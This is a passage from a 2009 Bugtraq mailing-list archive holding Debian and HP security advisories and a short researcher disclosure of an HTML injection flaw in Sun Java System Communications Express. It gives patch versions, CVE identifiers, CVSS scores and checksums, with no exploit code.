    Size/MD5 checksum:     1332 c657b80b61750fc072ce257c1d682b21
  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.diff.gz
    Size/MD5 checksum:     8253 04053487dbf0b49da04ded749d1c384e
  http://security.debian.org/pool/updates/main/z/znc/znc_0.058.orig.tar.gz
    Size/MD5 checksum:   340741 c02fd740c55d5b3a7912f7584344103e

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_alpha.deb
    Size/MD5 checksum:  1096362 92f9a65cd06d7da250f79a3d11e0a124

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_amd64.deb
    Size/MD5 checksum:  1028438 f2058b3d07a9233cef8f9ca0dfec6673

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_arm.deb
    Size/MD5 checksum:  1149682 3ed9f92e4ca7ee29ff3c60897cc71c21

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_hppa.deb
    Size/MD5 checksum:  1163022 359b9459a44f3653e2571cda2fb51085

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_i386.deb
    Size/MD5 checksum:  1013106 15b468bd87a584a0415584452d26ab38

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_ia64.deb
    Size/MD5 checksum:  1181082 f86b365aa064e782ea72a82d216edd62

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mips.deb
    Size/MD5 checksum:   916040 f6c21df1590da49c335bc76860e5af8d

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mipsel.deb
    Size/MD5 checksum:   906310 d156e11c8c0bedb5dd56fcfcf40730e9

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_powerpc.deb
    Size/MD5 checksum:  1034324 29a41349db3b895e1a6bdf0bdf249ff8

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_s390.deb
    Size/MD5 checksum:   970792 b0f4f9f9b0e38309fca19dabe60beef4

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_sparc.deb
    Size/MD5 checksum:  1000006 ea9cd30f00b2f9466dfeb84e96198099


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJtsx5AAoJEL97/wQC1SS+q8UH/1er3nhvWfhDamiBuVL0Z0Fk
n/Q5RjGvgFewUI9/uvVmrklaV+EkKjbD79w0ksHGxXilkuGNXsH1oQZgEvbWumgN
Cyuz2s167wkjsqDDm9kAp0ijbyBXQ3ogffN+42sKtKn3+1QRMB+0kdHBjdmSAyrx
j8Y/CqzVWgQXR0QbE37kgK/hd+0oKKwoTGQeSa2eB0r6xgJmFsJnZADjh+LVFYd2
f3whQ3N68oZTIPjDwKt5/UUyXIA6tZLt7SYd4R+VjqlSglLjrICpVjysNtVWkVm6
bdwDjn4fbYjfpJhCKg3CdKcVzG/lvo2zES5+d6sREFEH3qxyMKXqEdnJ3rLq9xQ=ubas
-----END PGP SIGNATURE-----

From - Wed Mar 11 10:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068bb
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39710-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F1B9BED880
for <lists@securityspace.com>; Wed, 11 Mar 2009 10:51:10 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1CCD2143F5A; Wed, 11 Mar 2009 07:46:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 30397 invoked from network); 10 Mar 2009 20:43:01 -0000
Date: Tue, 10 Mar 2009 15:16:51 -0600
Message-Id: <200903102116.n2ALGpka023556@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: sosoblood@hotmail.com
To: bugtraq@securityfocus.com
Subject: Sun Java System Communications Express [HTML Injection]
Status:   

Hello,

I have found a HTML Injection vulnerability in Sun Java� System Communications Express, a web client that provides an integrated web-based communication and collaboration client to the Sun Java Communications Suite. It consists of three client modules - Calendar, Address Book, and Mail.

Here is a screen-shot that demonstrates the vulnerability:
http://sosoblood.freehostia.com/SJSC/html_injection.gif

As we can see in the picture, I was able to inject some HTML and make my name in bold at the header of the page. Also, I was able to inject an image in the test message subject that I sent to myself.
One can also inject an IFRAME or any HTML tag.

However, the potential threat is limited by the limited characters size of some fields like the "Full Name" at the header of the page and the "Subject" of a message. So injecting long strings is impossible.

A solution for this vulnerability is implemented by using the htmlentities() function.

Thank you for reading.

Edgard Chammas [454447415244].

From - Wed Mar 11 12:01:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068bf
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39709-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 4A83BED87B
for <lists@securityspace.com>; Wed, 11 Mar 2009 11:52:10 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A093F143D71; Wed, 11 Mar 2009 07:45:53 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28261 invoked from network); 10 Mar 2009 20:00:19 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Tue, 10 Mar 2009 21:33:38 +0100
From: Steffen Joeris <white@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090310203338.GA5090@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.237.55
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-7.88 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MDO_BAD_WORD1=2.8,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1736-1] New mahara packages fix cross-site scripting
Priority: urgent
Resent-Message-ID: <P_Os1a81cAO.A.baD.56stJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Tue, 10 Mar 2009 20:34:01 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1736-1                  security@debian.org
http://www.debian.org/security/                           Steffen Joeris
March 10, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mahara
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-0660

It was discovered that mahara, an electronic portfolio, weblog, and
resume builder, is prone to cross-site scripting attacks, which allows
the injection of arbitrary Java or HTML code.

For the stable distribution (lenny), this problem has been fixed in
version 1.0.4-4+lenny1.

The oldstable distribution (etch) does not contain mahara.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem will be fixed soon.


We recommend that you upgrade your mahara package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.dsc
    Size/MD5 checksum:     1303 e78e2f84879067ead786f022b3fb9e65
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.diff.gz
    Size/MD5 checksum:    38565 dab9ae59c86acc880749118e0c7fab20
  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4.orig.tar.gz
    Size/MD5 checksum:  2383079 cf1158e4fe3cdba14fb1b71657bf8cc9

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1_all.deb
    Size/MD5 checksum:  1636658 52d68deb52604b9d5ae0ad910ef0ef78
  http://security.debian.org/pool/updates/main/m/mahara/mahara-apache2_1.0.4-4+lenny1_all.deb
    Size/MD5 checksum:     7778 9b1ddde46afd38972b0789e0c18e740a

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>















-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkm2zjoACgkQXm3vHE4uylp99ACdGLxX5QiuHmIP5ugO8mvWtuXT
HzcAoM0ifVwpizr87+vJt9XxqI8dLBPV
=R8Rx
-----END PGP SIGNATURE-----

From - Wed Mar 11 12:11:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068c0
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39714-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 24897ED87B
for <lists@securityspace.com>; Wed, 11 Mar 2009 12:06:39 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 6B2BA143BE0; Wed, 11 Mar 2009 08:39:56 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14636 invoked from network); 11 Mar 2009 14:54:50 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities
Date: Wed, 11 Mar 2009 08:20:52 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090311152052.841D7BF7E@hpchs.cup.hp.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01683026
Version: 1

HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-03-09
Last Updated: 2009-03-09

Potential Security Impact: Mulitple remote vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS)

References: SUNALERT ID: 244988 (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340, CVE-2008-5341, CVE-2008-5342, CVE-2008-5343, CVE-2008-5344), 246387 (CVE-2008-5345), 246366 (CVE-2008-5347), 246346 (CVE-2008-5348), 246266 CVE-2008-5350), 245246 (CVE-2008-5351), 244991 (CVE-2008-5353), 244990 (CVE-2008-5354), 244987 (CVE-2008-5356, CVE-2008-5357, CVE-2008-5358, CVE-2008-5359), 244986 (CVE-2008-5360)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier 
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier 
HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or earlier 

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================Reference                         Base Vector               Base Score 
CVE-2008-2086     (AV:N/AC:M/Au:N/C:C/I:C/A:C)     9.3
CVE-2008-5339     (AV:N/AC:L/Au:N/C:N/I:N/A:P)     5.0
CVE-2008-5340     (AV:N/AC:L/Au:N/C:C/I:C/A:C)    10.0
CVE-2008-5341     (AV:N/AC:L/Au:N/C:P/I:N/A:N)     5.0
CVE-2008-5342     (AV:N/AC:L/Au:N/C:P/I:N/A:N)     5.0
CVE-2008-5343     (AV:N/AC:L/Au:N/C:C/I:P/A:P)     9.0
CVE-2008-5344     (AV:N/AC:L/Au:N/C:P/I:P/A:P)     7.5
CVE-2008-5345     (AV:N/AC:L/Au:N/C:P/I:P/A:P)     7.5
CVE-2008-5347     (AV:N/AC:L/Au:N/C:P/I:P/A:P)     7.5
CVE-2008-5348     (AV:N/AC:M/Au:N/C:N/I:N/A:C)    7.1
CVE-2008-5350     (AV:N/AC:L/Au:N/C:P/I:N/A:N)     5.0
CVE-2008-5351     (AV:N/AC:L/Au:N/C:P/I:P/A:P)     7.5
CVE-2008-5353     (AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2008-5354     (AV:N/AC:M/Au:N/C:C/I:C/A:C)    9.3
CVE-2008-5356     (AV:N/AC:M/Au:N/C:C/I:C/A:C)    9.3
CVE-2008-5357     (AV:N/AC:M/Au:N/C:C/I:C/A:C)    9.3
CVE-2008-5358     (AV:N/AC:M/Au:N/C:C/I:C/A:C)    9.3
CVE-2008-5359     (AV:N/AC:M/Au:N/C:C/I:C/A:C)    9.3
CVE-2008-5360     (AV:N/AC:L/Au:N/C:P/I:P/A:N)     6.4
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 

RESOLUTION

HP has provided the following upgrades to resolve these vulnerabilities 
The upgrades are available from the following location: 

http://www.hp.com/go/java 

HP-UX B.11.31
 JDK and JRE v6.0.03 or subsequent
 JDK and JRE v5.0.15 or subsequent
 SDK and JRE v1.4.2.21 or subsequent
 
HP-UX B.11.23
 JDK and JRE v6.0.03 or subsequent 
 JDK and JRE v5.0.15 or subsequent
 SDK and JRE v1.4.2.21 or subsequent
 
HP-UX B.11.11
 JDK and JRE v6.0.03 or subsequent
 JDK and JRE v5.0.15 or subsequent
 SDK and JRE v1.4.2.21 or subsequent
 

MANUAL ACTIONS: Yes - Update 
For Java v6.0.02 and earlier, update to Java v6.0.03 or subsequent. 
For Java v5.0.14 and earlier, update to Java v5.0.15 or subsequent. 
For Java v1.4.2.20 and earlier, update to Java v1.4.2.21 or subsequent. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant. 

AFFECTED VERSIONS 
HP-UX B.11.11 
HP-UX B.11.23 
HP-UX B.11.31 
==========Jdk14.JDK14-COM 
Jdk14.JDK14-IPF32 
Jdk14.JDK14-IPF64 
Jdk14.JDK14-PA11 
Jdk14.JDK14-PA20 
Jdk14.JDK14-PA20W 
Jre14.JRE14-COM 
Jre14.JRE14-IPF32 
Jre14.JRE14-IPF32-HS 
Jre14.JRE14-IPF64 
Jre14.JRE14-IPF64-HS 
Jre14.JRE14-PA11 
Jre14.JRE14-PA11-HS 
Jre14.JRE14-PA20 
Jre14.JRE14-PA20-HS 
Jre14.JRE14-PA20W 
Jre14.JRE14-PA20W-HS 
action: install revision 1.4.2.21.00 or subsequent 

Jdk15.JDK15-COM 
Jdk15.JDK15-PA20 
Jdk15.JDK15-PA20W 
Jdk15.JDK15-IPF32 
Jdk15.JDK15-IPF64 
Jre15.JRE15-COM 
Jre15.JRE15-PA20 
Jre15.JRE15-PA20-HS 
Jre15.JRE15-PA20W 
Jre15.JRE15-PA20W-HS 
Jre15.JRE15-IPF32 
Jre15.JRE15-IPF32-HS 
Jre15.JRE15-IPF64 
Jre15.JRE15-IPF64-HS 
action: install revision 1.5.0.15.00 or subsequent 

Jdk60.JDK60-COM 
Jdk60.JDK60-PA20 
Jdk60.JDK60-PA20W 
Jdk60.JDK60-IPF32 
Jdk60.JDK60-IPF64 
Jre60.JRE60-COM 
Jre60.JRE60-IPF32 
Jre60.JRE60-IPF32-HS 
Jre60.JRE60-IPF64 
Jre60.JRE60-IPF64-HS 
Jre60.JRE60-PA20 
Jre60.JRE60-PA20-HS 
Jre60.JRE60-PA20W 
Jre60.JRE60-PA20W-HS 
action: install revision 1.6.0.03.00 or subsequent 

END AFFECTED VERSIONS 

HISTORY 
Version:1 (rev.1) 9 March 2009 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 


Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

�Copyright 2009 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSbZgP+AfOvwtKn1ZEQLqWgCgpK0tTDWGRJkDVpWzhFqI3asVAsMAnjKq
R3jvTn4bcr1e7cmNVRj6zNp+
=8OKZ
-----END PGP SIGNATURE-----

From - Wed Mar 11 13:41:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068c2
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39713-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C0284ED879
for <lists@securityspace.com>; Wed, 11 Mar 2009 13:35:51 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 15EF8143A0C; Wed, 11 Mar 2009 08:39:24 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14293 invoked from network); 11 Mar 2009 14:46:19 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access
Date: Wed, 11 Mar 2009 08:20:07 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090311152008.4454FBF78@hpchs.cup.hp.com>
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01655638
Version: 1

HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-03-09
Last Updated: 2009-03-09

Potential Security Impact: Remote unauthorized access to data, local unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with WMI Mapper for HP Systems Insight Manager running on Windows. The vulnerabilities could be exploited remotely to allow unauthorized access to data or locally to gain unauthorized access.

References: CVE-2009-0712, CVE-2009-0713

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
WMI Mapper for HP Systems Insight Manager prior to v2.5.2.0

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================Reference                         Base Vector               Base Score 
CVE-2009-0712     (AV:L/AC:L/Au:S/C:C/I:C/A:N)       6.2
CVE-2009-0713     (AV:N/AC:L/Au:N/C:P/I:N/A:N)       5.0
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
 
RESOLUTION

HP has provided the following software patch to resolve the vulnerability. 

The patch can be downloaded from http://www.hp.com/bizsupport/ 

WMIMapper2_6_0.msi or subsequent
 

PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 9 March 2009 Initial release 

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

�Copyright 2009 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSbUbhuAfOvwtKn1ZEQJkFwCdHGcxKKJ05owJj9iPwE0yXFZrNqMAn2Bu
wmU0rQ9+y4JnT3C3/Joa2cBr
=pfZN
-----END PGP SIGNATURE-----

From - Wed Mar 11 17:51:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068fd
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39717-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 66478ED879
for <lists@securityspace.com>; Wed, 11 Mar 2009 17:44:45 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 681BF236F46; Wed, 11 Mar 2009 14:39:45 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
